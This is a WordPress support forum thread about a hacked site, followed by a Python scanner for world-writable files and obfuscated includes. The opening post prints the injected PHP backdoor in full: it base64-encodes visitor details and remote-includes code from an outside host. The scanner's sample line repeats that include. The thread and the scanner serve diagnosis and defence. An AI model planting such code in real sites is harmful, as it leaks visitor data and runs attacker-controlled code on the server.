hacked by user7.phpinclude.ru

  • A few days ago WordPress suddenly stopped sending e-mails when a comment was posted. I changed the e-mail address but it did not help. Today when editing a new item I got an error message with the address http://user7.phpinclude.ru in it. After some searching I found that someone managed to inject the following code in the file wp-cach-config.php in the wp-content directory:

    error_reporting(0);
    $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
    $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
    $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
    $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
    $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
    $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
    $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);
    if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))) { } else
    { include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str); }

    Because wp-cache needs a writeable wp-content directory, someone was able to put this in. It sends stuff to phpinclude.ru. Probably to catch e-mail addresses for spam.

    Does anyone know how to prevent this or how to use wp-cache without a writeable wp-content directory?

Viewing 7 replies - 1 through 7 (of 7 total)
  • Another title for this post could be: CHMOD 777 is very dangerous.
    Features of WordPress (upload) and plugins (e.g. WP_Cache and Lazyest Gallery) depend on this. Why is this? How can I use CHMOD 755 on directories used by these features?

    @ macbrink
    It mostly depends on your host. I run sites on 2 differing servers that do fine with 755 – as do others here. However, I’ve installed on plenty that won’t.
    Ask your host to fix this issue.

    I’ll ask them to look into it.

    Features of WordPress (upload) and plugins (e.g. WP_Cache and Lazyest Gallery) depend on this. Why is this?

    Because if you have the webserver able to write files, then you have to make it actually able to write files.

    Those features are not dependent on a chmod of 777, they are dependent on the ability of the webserver to create and write to files. Which means, ultimately, that they depend on the configuration of your webserver. The username it runs as, the permissions associated with that user, etc.

    Hm, so probably the ‘user’ running my WordPress installation does not have enough rights? That should be something my host should take care of.

    This topic has been answered before http://wordpress.org/support/topic/95881?replies=19

    Our host has changed the permissions structure. WordPress and plugins are OK now on CHMOD 755.
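
A defensive check for the two things this thread describes, as an added example (not code from the thread, WordPress or WP-Cache): it walks a directory tree, reports paths with the world-writable bit that chmod 777 sets, and flags PHP files whose include/require target is built with base64_decode(), decoding the literals so the destination is visible. The function names and the SAMPLE line are constructed for illustration.

```python
import base64, os, re, stat, sys

# include/require whose argument is assembled with base64_decode(), as in the post
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*?base64_decode\s*\(", re.I)
# string literal handed to base64_decode(); straight or typographic quotes
B64_RE = re.compile(r"base64_decode\s*\(\s*[\"'\u201c\u201d]([A-Za-z0-9+/=]+)[\"'\u201c\u201d]")

# Constructed sample: one statement in the style of the injected code quoted above
SAMPLE = ('<?php include_once(base64_decode("aHR0cDovLw==")'
          '.base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str); ?>')

def decode_literals(php_source):
    """Decode every base64 literal passed to base64_decode(), in order, without repeats."""
    decoded = []
    for match in B64_RE.finditer(php_source):
        try:
            text = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64: skip it
            continue
        if text not in decoded:
            decoded.append(text)
    return decoded

def scan_tree(root):
    """Report world-writable paths and PHP files that include a base64-built target."""
    findings = {"world_writable": [], "obfuscated_include": []}
    for dirpath, _dirs, files in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in sorted(files)]:
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):  # do not follow or report symlinks
                continue
            rel = os.path.relpath(path, root)
            if mode & stat.S_IWOTH:  # the "other" write bit that chmod 777 sets
                findings["world_writable"].append(rel)
            if stat.S_ISREG(mode) and path.endswith(".php"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    source = fh.read()
                if INCLUDE_RE.search(source):
                    findings["obfuscated_include"].append((rel, decode_literals(source)))
    return findings

if __name__ == "__main__":
    result = scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".")
    for rel in result["world_writable"]:
        print("world-writable:", rel)
    for rel, targets in result["obfuscated_include"]:
        print("obfuscated include:", rel, "->", targets)
```

Run it with the WordPress root as the only argument; a clean tree prints nothing.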
